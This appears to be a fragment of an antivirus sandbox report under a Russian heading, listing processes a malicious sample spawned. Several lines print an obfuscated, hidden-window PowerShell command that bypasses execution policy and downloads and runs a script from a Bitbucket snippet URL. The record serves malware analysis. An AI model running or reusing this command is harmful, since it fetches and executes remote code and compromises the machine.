Техническая информация
- '<SYSTEM32>\cmd.exe' /c start /min PowerShell -ex Bypass -nOp -w h ;i'E'x(iwr('https://bitbucket.org/!api/2.0/snippets/pro2pro/yExKK7/c74ab93a5ab77a0aecaef1c44ef197e5c77f37c8/files/usman-start') -useB); Start-Sleep...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1352
- %TEMP%\709976.cvr
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ex Bypass -nOp -w h ;i'E'x(iwr('https://bitbucket.org/!api/2.0/snippets/pro2pro/yExKK7/c74ab93a5ab77a0aecaef1c44ef197e5c77f37c8/files/usman-start') -useB); Start-Sleep -Seconds 5
- '<SYSTEM32>\cmd.exe' /c start /min PowerShell -ex Bypass -nOp -w h ;i'E'x(iwr('https://bitbucket.org/!api/2.0/snippets/pro2pro/yExKK7/c74ab93a5ab77a0aecaef1c44ef197e5c77f37c8/files/usman-start') -useB); Start-Sleep... (со скрытым окном)